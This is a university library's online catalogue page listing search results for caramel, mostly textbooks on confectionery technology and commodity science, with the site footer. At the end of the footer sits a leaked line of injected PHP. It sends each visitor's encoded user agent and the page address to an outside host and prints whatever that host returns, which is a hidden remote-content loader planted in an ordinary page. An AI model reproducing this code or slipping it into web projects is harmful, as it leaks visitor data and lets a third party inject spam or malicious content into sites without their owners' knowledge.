Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

52 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Карамель")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 24
1. 
Лурье И. С. Технология кондитерского производства [Текст] / И. С. Лурье, 1992. - 399 с.
Держатели документа (Информация об экземплярах) 
2. 
Введение в технологию продуктов питания [Текст] / Н. Г. Кульнева [и др.], 2012. - 117 с.
Держатели документа (Информация об экземплярах) 

В практикуме изложены теоретические сведения и характеристика исследуемых объектов, порядок и методики выполнения лабораторных работ, вопросы для самоконтроля, список рекомендуемой литературы.

Разработан в соответствии с требованиями ФГОС ВПО третьего поколения подготовки бакалавров по направлению 260100 «Продукты питания из растительного сырья». Предназначен для закрепления теоретических знаний дисциплин профессионального цикла. Может быть использован для бакалавров направлений 080200 «Менеджмент» и 151000 «Технологические машины и оборудование», специализирующихся в области пищевых производств.

3. 
Пашук З. Н. Мучные кондитерские изделия [Текст] / З. Н. Пашук, Т. К. Апет, 1997. - 459 с.
Ключевые слова 
ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОИЗВОДСТВО КОНДИТЕРСКОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- МУКА -- КРАХМАЛ -- САХАР -- МЕД -- ПАТОКА -- ЯЙЦА -- МОЛОКО -- МАСЛО -- МАРГАРИН -- ЖИР -- ФРУКТЫ -- ЯГОДЫ -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ДОБАВКА ВКУСОВАЯ -- ОРЕХИ -- МАК -- ПЕЧЕНЬЕ САХАРНОЕ -- ПЕЧЕНЬЕ ЗАТЯЖНОЕ -- ПЕЧЕНЬЕ СДОБНОЕ -- ГАЛЕТЫ -- КРЕКЕР -- ВЫПЕЧКА ПЕЧЕНЬЯ -- ПРЯНИК -- КЕКС -- БАБА РОМОВАЯ -- ТОРТ -- СИРОП -- ПОМАДА -- КАРАМЕЛЬ -- КАНДИР ДЛЯ САХАРНЫХ ФИГУР -- КРЕМ -- МАРЦИПАН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ - ТРЕБОВАНИЯ САНИТАРНЫЕ -- ПРАВИЛА ЛИЧНОЙ ГИГИЕНЫ -- СРЕДСТВА МОЮЩИЕ -- СРЕДСТВА ДЕЗИНФИЦИРУЮЩИЕ -- ОСМОТР МЕДИЦИНСКИЙ ЕЖЕСМЕННЫЙ -- ЛАМПА БАКТЕРИЦИДНАЯ
Держатели документа (Информация об экземплярах) 
4. 
Бурчакова И. Ю. Организация процесса приготовления и приготовление сложных хлебобулочных, мучных кондитерских изделий [Текст] / И. Ю. Бурчакова, С. В. Ермилова, 2014. - 384 с. : [8] вкл. цв. л. с.
Ключевые слова 
ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- МИНИ - ПЕКАРНЯ -- ОБОРУДОВАНИЕ МЕХАНИЧЕСКОЕ -- ОБОРУДОВАНИЕ СОРТИРОВОЧНО - КАЛИБРОВОЧНОЕ -- ОБОРУДОВАНИЕ МОЕЧНОЕ -- ОБОРУДОВАНИЕ МЕСИЛЬНО - ПЕРЕМЕШИВАЮЩЕЕ -- ОБОРУДОВАНИЕ ДОЗИРОВОЧНО - ФОРМОВОЧНОЕ -- ОБОРУДОВАНИЕ ИЗМЕЛЬЧИТЕЛЬНО-РЕЖУЩЕЕ -- ОБОРУДОВАНИЕ РАЗБРЫЗГИВАЮЩЕЕ -- ОБОРУДОВАНИЕ СПЕЦИАЛЬНОЕ -- ОБОРУДОВАНИЕ УПАКОВОЧНОЕ -- ОБОРУДОВАНИЕ ТЕПЛОВОЕ -- ОБОРУДОВАНИЕ ВАРОЧНОЕ -- ОБОРУДОВАНИЕ ДЛЯ РАССТОЙКИ ТЕСТОВЫХ ЗАГОТОВОК -- ОБОРУДОВАНИЕ ЖАРОЧНОЕ -- ПЛИТА -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ТРЕБОВАНИЯ САНИТАРНЫЕ -- КОНТРОЛЬ КАЧЕСТВА КОНДИТЕРСКИХ ИЗДЕЛИЙ -- СЫРЬЕ КОНДИТЕРСКОЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ СЫРЬЯ -- ПОЛУФАБРИКАТЫ КОНДИТЕРСКИЕ -- СИРОП -- ПОМАДА -- ЖЕЛЕ -- ГЛАЗУРЬ КОНДИТЕРСКАЯ -- КРЕМ -- МУСС -- КАРАМЕЛЬ -- МАРЦИПАН -- МАСТИКА САХАРНАЯ -- ПРАЛИНЕ -- ПОСЫПКА КОНДИТЕРСКАЯ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ СЛОЖНЫЕ -- ХЛЕБ ПРАЗДНИЧНЫЙ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ СЛОЖНЫЕ -- ПОЛУФАБРИКАТЫ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ПРЯНИЧНЫЕ -- ТОРТЫ -- КАЧЕСТВО КОНДИТЕРСКИХ ИЗДЕЛИЙ -- ХРАНЕНИЕ КОНДИТЕРСКИХ ИЗДЕЛИЙ -- МЕРА - МАССА
Держатели документа (Информация об экземплярах) 
5. 
Табаторович, Александр Николаевич. Товароведение однородных групп продовольственных товаров (зерномучные и кондитерские товары) [Текст] / А. Н. Табаторович ; дар. А. Н. Табаторович, 2017. - 183 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии рассмотрены вопросы терминологии, классификации, пищевой ценности, формирования и оценки качества основных видов и разновидностей зерномучных и кондитерских товаров. Классификация ассортимента, показатели качества и безопасности представлены в соответствии с действующими нормативными документами и Техническими регламентами Таможенного союза.

Пособие предназначено для студентов, обучающихся по направлениям подготовки 38.03.07 "Товароведение" и 38.03.06 "Торговое дело". Может быть полезно для товароведов-экспертов, коммерсантов и других практических работников, чья деятельность связана с производством, продажей и хранением указанных групп товаров.

Полный текст
6. 
Экспертиза продовольственных товаров: Лабораторный практикум [Текст] / сост. Ю. И. Сидоренко [и др.] ; ред. Ю. И. Сидоренко, 2013. - 180, [1] с.
Держатели документа (Информация об экземплярах) 

В лабораторном практикуме изложены методы экспертизы качества основных групп продовольственных товаров, сгруппированных согласно учебной товароведческой классификации.

Приведены примеры экспертизы основных видов продовольственных товаров в каждой товароведческой группе. Рассмотрены нормативная база, состоящая из основных нормативных документов, относящихся к данной товароведческой группе, основные термины и определения, касающиеся технологии и оборота товаров данной товароведческой группы. Приведены основные методы оценки по органолептическим и физико-химическим показателям товаров.

Лабораторный практикум предназначен для студентов, обучающихся по специальностям 260504.65 "Технология консервов и пищеконцентратов", 260505.65 "Технология детского и функционального питания" и 260503.65 "Технология субтропических и пищевкуковых продуктов".

7. 
Драгилев, Абрам Иосифович. Технологическое оборудование: хлебопекарное, макаронное и кондитерское [Текст] / А. И. Драгилев, В. М. Хромеенков, М. Е. Чернов ; дар. В. В. Арсеньев, 2006. - 428, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о конструкционных материалах, транспортирующих устройства, общем и специализированном оборудовании для производства хлебных, макаронных и кондитерских изделий.

Для студентов образовательных учреждений среднего профессионального образования.

8. 
Драгилев, Абрам Иосифович. Технологическое оборудование: хлебопекарное, макаронное и кондитерское [Текст] / А. И. Драгилев, В. М. Хромеенков, М. Е. Чернов ; дар. В. В. Арсеньев, 2004. - 428, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о конструкционных материалах, транспортирующих устройства, общем и специализированном оборудовании для производства хлебных, макаронных и кондитерских изделий.

Для студентов образовательных учреждений среднего профессионального образования.

9. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

10. 
Производство хлеба, хлебобулочных и кондитерских изделий. Торты и пирожные [Текст] / сост. В. А. Шипов, 1999. - 286 с.
Держатели документа (Информация об экземплярах) 
11. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
12. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

13. 
Кивинов, Андрей. Умирать подано [Текст] : повести : рассказы / А. Кивинов, 1999. - 448 с.
Оглавление 
  • Три маленькие повести о любви
  • Карамель - I
  • Карамель - II
Держатели документа (Информация об экземплярах) 
14. 
Кивинов, Андрей. Карамель - III [Текст] : Повести, рассказы / А. Кивинов, 2000. - 318 с.
Оглавление 
  • Танцы на льду
  • Ля-ля-фа
Держатели документа (Информация об экземплярах) 
15. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
16. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
17. 
Драгилев А. И. Технология кондитерских изделий [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / А. И. Драгилев, И. С. Лурье, 2003. - 429 с.
Держатели документа (Информация об экземплярах) 
18. 
Скобельская З. Г. Технология производства сахарных кондитерских изделий [Текст] : Учеб. для учреждений нач. проф. образования / З. Г. Скобельская, Г. Н. Горячева, 2002. - 412 с.
Держатели документа (Информация об экземплярах) 
19. 
Сборник основных рецептур сахаристых кондитерских изделий [Текст] : сборник / Сост. Н. С. Павлова, 2003. - 230 с.
Держатели документа (Информация об экземплярах) 
20. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] : Учеб. для вузов по специальностям "Технология хлеба, кондит. и макарон. изделий", "Машины и аппараты пищевых пр-в" / А. И. Драгилев, Г. А. Маршалкин, 1999. - 447 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2875 - 24.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.97 с.12 запросов, 0.60c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;